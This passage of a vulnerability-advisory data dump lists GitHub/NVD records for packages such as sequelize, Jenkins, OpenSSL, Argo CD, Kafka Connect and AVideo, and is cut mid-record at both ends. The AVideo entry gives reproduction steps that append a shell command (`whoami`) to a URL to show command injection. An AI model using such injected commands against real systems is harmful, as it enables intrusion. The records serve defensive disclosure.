{'fixed': '7.0.0-alpha.20'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.29.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.28.2'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22578'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/CVE-2023-22578'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/DIVD-2022-00020/'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/discussions/15694'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20'}]","{'cwe_ids': ['CWE-790'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T23:16:24Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}" 1.4.0,GHSA-gm7m-rqf8-jx4m,2023-02-22T16:31:38Z,2023-02-11T03:32:49Z,,['CVE-2023-0780'],Improper Restriction of Rendered UI Layers or Frames in cockpit-hq/cockpit,Improper Restriction of Rendered UI Layers or Frames in GitHub repository cockpit-hq/cockpit prior to 2.3.9.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cockpit-hq/cockpit'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0780'}, {'type': 'WEB', 'url': 'https://github.com/cockpit-hq/cockpit/commit/8450bdf7e1dc23e9d88adf30a2aa9101c0c41720'}, {'type': 'PACKAGE', 'url': 'https://github.com/cockpit-hq/cockpit'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/801efd0b-404b-4670-961a-12a986252fa4'}]","{'cwe_ids': ['CWE-1021'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T01:02:50Z', 'nvd_published_at': '2023-02-11T02:20:00Z'}" 1.4.0,GHSA-gf34-hh5r-f74h,2023-02-23T22:08:43Z,2023-02-12T15:30:25Z,,['CVE-2023-0794'],Cross-site Scripting in thorsten/phpmyfaq,Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0794'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/edf0f6f90d4deaf46b4fd97ae92f16c1e10a2635'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/949975f1-271d-46aa-85e5-1a013cdb5efb'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:47:02Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-p2fr-mq9m-6w6p,2023-02-23T21:31:22Z,2023-02-15T15:30:41Z,,['CVE-2023-25764'],Cross-site Scripting in Jenkins Email Extension Plugin,"Jenkins Email Extension Plugin 2.93 and earlier does not escape, sanitize, or sandbox rendered email template output or log output generated during template rendering, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to create or change custom email templates.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:email-ext'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.93'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25764'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/email-ext-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-2934'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:53:51Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-vfmp-9999-6wqj,2023-02-22T00:10:52Z,2023-02-21T15:30:23Z,,['CVE-2021-32855'],Vditor Cross-site Scripting vulnerability,"Vditor is a browser-side Markdown editor. Versions prior to 3.8.7 are vulnerable to copy-paste cross-site scripting (XSS). For this particular type of XSS, the victim needs to be fooled into copying a malicious payload into the text editor. Version 3.8.7 contains a patch for this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'vditor'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32855'}, {'type': 'WEB', 'url': 'https://github.com/Vanessa219/vditor/issues/1085'}, {'type': 'WEB', 'url': 'https://github.com/Vanessa219/vditor/commit/1b2382d7f8a4ee509d9245db4450d926a0b24146'}, {'type': 'PACKAGE', 'url': 'https://github.com/Vanessa219/vditor'}, {'type': 'ADVISORY', 'url': 'https://securitylab.github.com/advisories/GHSL-2021-1006-vditor/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:10:52Z', 'nvd_published_at': '2023-02-21T15:15:00Z'}" 1.4.0,GHSA-hfrx-6qgj-fp6c,2023-03-02T19:56:24Z,2023-02-20T18:30:17Z,,['CVE-2023-24998'],Apache Commons FileUpload denial of service vulnerability,"Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'commons-fileupload:commons-fileupload'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-24998'}, {'type': 'WEB', 'url': 'https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17'}, {'type': 'WEB', 'url': 'https://commons.apache.org/proper/commons-fileupload/security-reports.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/commons-fileupload'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202305-37'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/05/22/1'}]","{'cwe_ids': ['CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T00:12:07Z', 'nvd_published_at': '2023-02-20T16:15:00Z'}" 1.4.0,GHSA-29xx-hcv2-c4cp,2023-02-21T20:00:22Z,2023-02-08T22:23:39Z,,['CVE-2023-0216'],openssl-src subject to Invalid pointer dereference in `d2i_PKCS7` functions,"An invalid pointer dereference on read can be triggered when an application tries to load malformed PKCS7 data with the `d2i_PKCS7()`, `d2i_PKCS7_bio()` or `d2i_PKCS7_fp()` functions. The result of the dereference is an application crash which could lead to a denial of service attack. The TLS implementation in OpenSSL does not call this function however third party applications might call these functions on untrusted data. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0216'}, {'type': 'WEB', 'url': 'https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=934a04f0e775309cadbef0aa6b9692e1b12a76c6'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0011.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:23:39Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-p52g-cm5j-mjv4,2023-02-24T19:03:43Z,2023-02-08T22:31:42Z,,['CVE-2022-4304'],openssl-src subject to Timing Oracle in RSA Decryption,"A timing based side channel exists in the OpenSSL RSA Decryption implementation which could be sufficient to recover a plaintext across a network in a Bleichenbacher style attack. To achieve a successful decryption an attacker would have to be able to send a very large number of trial messages for decryption. The vulnerability affects all RSA padding modes: PKCS#1 v1.5, RSA-OEAP and RSASVE. For example, in a TLS connection, RSA is commonly used by a client to send an encrypted pre-master secret to the server. An attacker that had observed a genuine connection between a client and a server could use this flaw to send trial messages to the server and record the time taken to process them. After a sufficiently large number of messages the attacker could recover the pre-master secret used for the original connection and thus be able to decrypt the application data sent over that connection. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '111.25.0'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'openssl-src'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '300.0.0'}, {'fixed': '300.0.12'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-4304'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0007.html'}, {'type': 'WEB', 'url': 'https://www.openssl.org/news/secadv/20230207.txt'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:31:42Z', 'nvd_published_at': '2023-02-08T20:15:00Z'}" 1.4.0,GHSA-4w59-c3gc-rrhp,2023-03-10T15:32:03Z,2023-02-28T23:20:05Z,,['CVE-2023-23929'],vantage6 refresh tokens do not expire,"From issue: Problem description Currently, the refresh token is valid indefinitely. This is bad security practice. Desired solution The refresh token should get a validity of 24-48 hours. Additional context When implementing this, also check that the refresh token returns a new refresh token When implementing this, also adapt the UI so that it logs out if refresh token is no longer valid. When implementing this, ensure that nodes refresh their token periodically so that they do not have to be restarted manually. ### Impact ### Patches None available ### Workarounds None available ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'vantage6'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.8.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/security/advisories/GHSA-4w59-c3gc-rrhp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23929'}, {'type': 'WEB', 'url': 'https://github.com/vantage6/vantage6/commit/48ebfca42359e9a6743e9598684585e2522cdce8'}, {'type': 'PACKAGE', 'url': 'https://github.com/vantage6/vantage6'}]","{'cwe_ids': ['CWE-613'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T23:20:05Z', 'nvd_published_at': '2023-03-04T00:15:00Z'}" 1.4.0,GHSA-mv6w-j4xc-qpfw,2023-06-13T23:44:12Z,2023-02-08T22:37:10Z,,['CVE-2023-25163'],Argo CD leaks repository credentials in user-facing error messages and in logs,"### Impact All versions of Argo CD starting with v2.6.0-rc1 have an output sanitization bug which leaks repository access credentials in error messages. These error messages are visible to the user, and they are logged. The error message is visible when a user attempts to create or update an Application via the Argo CD API (and therefor the UI or CLI). The user must have `applications, create` or `applications, update` RBAC access to reach the code which may produce the error. The user is not guaranteed to be able to trigger the error message. They may attempt to spam the API with requests to trigger a rate limit error from the upstream repository. If the user has `repositories, update` access, they may edit an existing repository to introduce a URL typo or otherwise force an error message. But if they have that level of access, they are probably intended to have access to the credentials anyway. ### Patches A patch for this vulnerability has been released in the following Argo CD version: * v2.6.1 ### Workarounds The only way to completely resolve the issue is to upgrade. #### Mitigations To mitigate the issue, make sure that your repo credentials have only least necessary privileges. For example, the credentials should not have push access, and they should not have access to more resources than what Argo CD actually needs (for example, a whole GitHub org when only one repo is needed). To further mitigate the impact of a leaked write-capable repo credential, you could [enable commit signature verification](https://argo-cd.readthedocs.io/en/stable/user-guide/gpg-verification/#enforcing-signature-verification). Even if someone could push a malicious commit, the commit would not by synced. You should also enforce least privileges in Argo CD RBAC. Make sure users only have `repositories, update`, `applications, update`, or `applications, create` access if they absolutely need it. ### References * The problem was initially reported in a [GitHub issue](https://github.com/argoproj/argo-cd/issues/12309) * [Argo CD RBAC configuration documentation](https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/) ### For more information * Open an issue in [the Argo CD issue tracker](https://github.com/argoproj/argo-cd/issues) or [discussions](https://github.com/argoproj/argo-cd/discussions) * Join us on [Slack](https://argoproj.github.io/community/join-slack) in channel #argo-cd ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0-rc1'}, {'fixed': '2.6.1'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/argoproj/argo-cd/v2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0-rc1'}, {'fixed': '2.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/security/advisories/GHSA-mv6w-j4xc-qpfw'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25163'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/issues/12309'}, {'type': 'WEB', 'url': 'https://github.com/argoproj/argo-cd/pull/12320'}, {'type': 'WEB', 'url': 'https://argo-cd.readthedocs.io/en/stable/operator-manual/rbac/'}, {'type': 'PACKAGE', 'url': 'https://github.com/argoproj/argo-cd'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1548'}]","{'cwe_ids': ['CWE-532'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:37:10Z', 'nvd_published_at': '2023-02-08T21:15:00Z'}" 1.4.0,GHSA-w479-w22g-cffh,2023-02-28T00:05:48Z,2023-02-17T00:30:28Z,,['CVE-2023-0821'],Uncontrolled Resource Consumption in Hashicorp Nomad,"HashiCorp Nomad and Nomad Enterprise 1.2.15 up to 1.3.8, and 1.4.3 jobs using a maliciously compressed artifact stanza source can cause excessive disk usage. Fixed in 1.2.16, 1.3.9, and 1.4.4.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.2.15'}, {'fixed': '1.2.16'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.3.0'}, {'fixed': '1.3.9'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/hashicorp/nomad'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.4.0'}, {'fixed': '1.4.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0821'}, {'type': 'WEB', 'url': 'https://discuss.hashicorp.com/t/hcsec-2023-05-nomad-client-vulnerable-to-decompression-bombs-in-artifact-block/50292'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T14:00:26Z', 'nvd_published_at': '2023-02-16T22:15:00Z'}" 1.4.0,GHSA-626q-v9j4-mcp4,2023-02-13T16:56:47Z,2023-02-02T16:59:46Z,,['CVE-2023-23940'],OpenZeppelin Contracts contains Improper Verification of Cryptographic Signature,"### Cause `is_valid_eth_signature` is missing a call to `finalize_keccak` after calling `verify_eth_signature`. ### Impact As a result, any contract using `is_valid_eth_signature` from the account library (such as the `EthAccount` preset) is vulnerable to a malicious sequencer. Specifically, the malicious sequencer would be able to bypass signature validation to impersonate an instance of these accounts. ### Risk In order to exploit this vulnerability, it is required to control a sequencer or prover since they're the ones executing the hints, being able to inject incorrect keccak results. Today StarkWare is the only party running both a prover or a sequencer, greatly reducing the risk of exploit. ### Patches The issue has been patched in 0.6.1. ### For more information If you have any questions or comments about this advisory: * Open an issue in [the Contracts for Cairo repository](https://github.com/OpenZeppelin/cairo-contracts/issues/new/choose) * Email us at [security@openzeppelin.com](mailto:security@openzeppelin.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'openzeppelin-cairo-contracts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.2.0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/cairo-contracts/security/advisories/GHSA-626q-v9j4-mcp4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23940'}, {'type': 'WEB', 'url': 'https://github.com/OpenZeppelin/cairo-contracts/pull/542/commits/6d4cb750478fca2fd916f73297632f899aca9299'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenZeppelin/cairo-contracts'}]","{'cwe_ids': ['CWE-345', 'CWE-347'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-02T16:59:46Z', 'nvd_published_at': '2023-02-03T20:15:00Z'}" 1.4.0,GHSA-26f8-x7cc-wqpc,2023-07-21T18:01:38Z,2023-02-07T21:30:23Z,,['CVE-2023-25194'],Apache Kafka Connect vulnerable to Deserialization of Untrusted Data,"A possible security vulnerability has been identified in Apache Kafka Connect API. This requires access to a Kafka Connect worker, and the ability to create/modify connectors on it with an arbitrary Kafka client SASL JAAS config and a SASL-based security protocol, which has been possible on Kafka Connect clusters since Apache Kafka Connect 2.3.0. When configuring the connector via the Kafka Connect REST API, an authenticated operator can set the `sasl.jaas.config` property for any of the connector's Kafka clients to ""com.sun.security.auth.module.JndiLoginModule"", which can be done via the `producer.override.sasl.jaas.config`, `consumer.override.sasl.jaas.config`, or `admin.override.sasl.jaas.config` properties. This will allow the server to connect to the attacker's LDAP server and deserialize the LDAP response, which the attacker can use to execute java deserialization gadget chains on the Kafka connect server. Attacker can cause unrestricted deserialization of untrusted data (or) RCE vulnerability when there are gadgets in the classpath. Since Apache Kafka 3.0.0, users are allowed to specify these properties in connector configurations for Kafka Connect clusters running with out-of-the-box configurations. Before Apache Kafka 3.0.0, users may not specify these properties unless the Kafka Connect cluster has been reconfigured with a connector client override policy that permits them. Since Apache Kafka 3.4.0, we have added a system property (""-Dorg.apache.kafka.disallowed.login.modules"") to disable the problematic login modules usage in SASL JAAS configuration. Also by default ""com.sun.security.auth.module.JndiLoginModule"" is disabled in Apache Kafka Connect 3.4.0. We advise the Kafka Connect users to validate connector configurations and only allow trusted JNDI configurations. Also examine connector dependencies for vulnerable versions and either upgrade their connectors, upgrading that specific dependency, or removing the connectors as options for remediation. Finally, in addition to leveraging the ""org.apache.kafka.disallowed.login.modules"" system property, Kafka Connect users can also implement their own connector client config override policy, which can be used to control which Kafka client properties can be overridden directly in a connector config and which cannot.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.kafka:connect'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '3.4.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25194'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/1529790'}, {'type': 'WEB', 'url': 'https://kafka.apache.org/cve-list'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/vy1c7fqcdqvq5grcqp6q5jyyb302khyz'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/173151/Apache-Druid-JNDI-Injection-Remote-Code-Execution.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:18:02Z', 'nvd_published_at': '2023-02-07T20:15:00Z'}" 1.4.0,GHSA-8x6c-cv3v-vp6g,2023-02-14T02:40:00Z,2023-02-11T00:13:31Z,2023-02-14T02:40:00Z,[],"Withdrawn: cacheable-request depends on http-cache-semantics, which is vulnerable to Regular Expression Denial of Service","## This advisory is withdawn. cacheable-request depends on http-cache-semanttics, which contains an Inefficient Regular Expression Complexity in versions prior to 4.1.1 of that package. cacheable-request has been updated to rely on the fixed version in 10.2.7. ### Summary of http-cache-semantics vulnerability http-cache semantics contains an Inefficient Regular Expression Complexity , leading to Denial of Service. This affects versions of the package http-cache-semantics before 4.1.1. The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library. ### Details https://github.com/advisories/GHSA-rc47-6667-2j5j ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'cacheable-request'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.2.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/jaredwray/cacheable-request/security/advisories/GHSA-8x6c-cv3v-vp6g'}, {'type': 'WEB', 'url': 'https://github.com/jaredwray/cacheable-request/commit/8a47777e4eb61960469873cf4b3a2823742fc15e'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-rc47-6667-2j5j'}, {'type': 'PACKAGE', 'url': 'https://github.com/jaredwray/cacheable-request'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-11T00:13:31Z', 'nvd_published_at': None}" 1.4.0,GHSA-8c25-f3mj-v6h8,2023-02-22T23:15:10Z,2023-02-16T15:30:28Z,,['CVE-2023-22580'],Sequelize information disclosure vulnerability,"Due to improper input filtering in the sequelize js library, can malicious queries lead to sensitive information disclosure.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.28.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@sequelize/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0-alpha.20'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22580'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/15375'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/15699'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/CVE-2023-22580'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/DIVD-2022-00020/'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v6.28.1'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20'}]","{'cwe_ids': ['CWE-200'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-22T23:15:10Z', 'nvd_published_at': '2023-02-16T15:15:00Z'}" 1.4.0,GHSA-qx34-47fc-vv79,2023-02-16T21:53:07Z,2023-02-08T06:30:33Z,,['CVE-2023-0739'],Answer vulnerable to Race Condition,Race Condition in Switch in GitHub repository answerdev/answer prior to 1.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0739'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/1ee34b884b905d14d4db457563176b77a974b992'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/93d7fac9-50be-4624-9096-45b89fbfd4ae'}]","{'cwe_ids': ['CWE-362', 'CWE-365'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T22:33:00Z', 'nvd_published_at': '2023-02-08T05:15:00Z'}" 1.4.0,GHSA-rwhw-6c6r-2823,2023-02-10T00:19:14Z,2023-02-03T18:30:26Z,,['CVE-2021-37304'],Insecure Permissions issue in jeecg-boot,An Insecure Permissions issue in jeecg-boot 2.4.5 allows unauthenticated remote attackers to gain escalated privilege and view sensitive information via the httptrace interface.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-base'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.4.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37304'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/2793'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-732'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-04T00:30:25Z', 'nvd_published_at': '2023-02-03T18:15:00Z'}" 1.4.0,GHSA-9w8x-5hv5-r6gw,2023-04-04T21:45:28Z,2023-02-15T06:30:26Z,,['CVE-2022-25978'],Cross Site Scripting in usememos/memos,"All versions of the package github.com/usememos/memos/server prior to 0.11.0 are vulnerable to Cross-site Scripting (XSS) due to insufficient checks on external resources, which allows malicious actors to introduce links starting with a javascript: scheme.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/usememos/memos'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.11.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 0.10.3'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-25978'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/issues/1026'}, {'type': 'WEB', 'url': 'https://github.com/usememos/memos/commit/b11d2130a084385eb65c3761a3c841ebe9f81ae8'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2023-1566'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-GOLANG-GITHUBCOMUSEMEMOSMEMOSSERVER-3319070'}, {'type': 'PACKAGE', 'url': 'github.com/usememos/memos'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:16:31Z', 'nvd_published_at': '2023-02-15T05:15:00Z'}" 1.4.0,GHSA-pgvh-p3g4-86jw,2023-04-27T19:55:01Z,2023-02-02T01:32:42Z,,['CVE-2023-25313'],AVideo contains Command injection when embedding a video link,"Impact: An attacker could execute remote code on a system running wwbn/avideo Step to Reproduce: 1. Go to the `My Videos` tab https://demo.avideo.com/mvideos 2. Click ""Embed a video link"" Append a command to the url as a query string. eg. `?whoami` then click Save This issue has been resolved in commit `236228f15`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wwbn/avideo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.4'}]}]}]","[{'type': 'WEB', 'url': 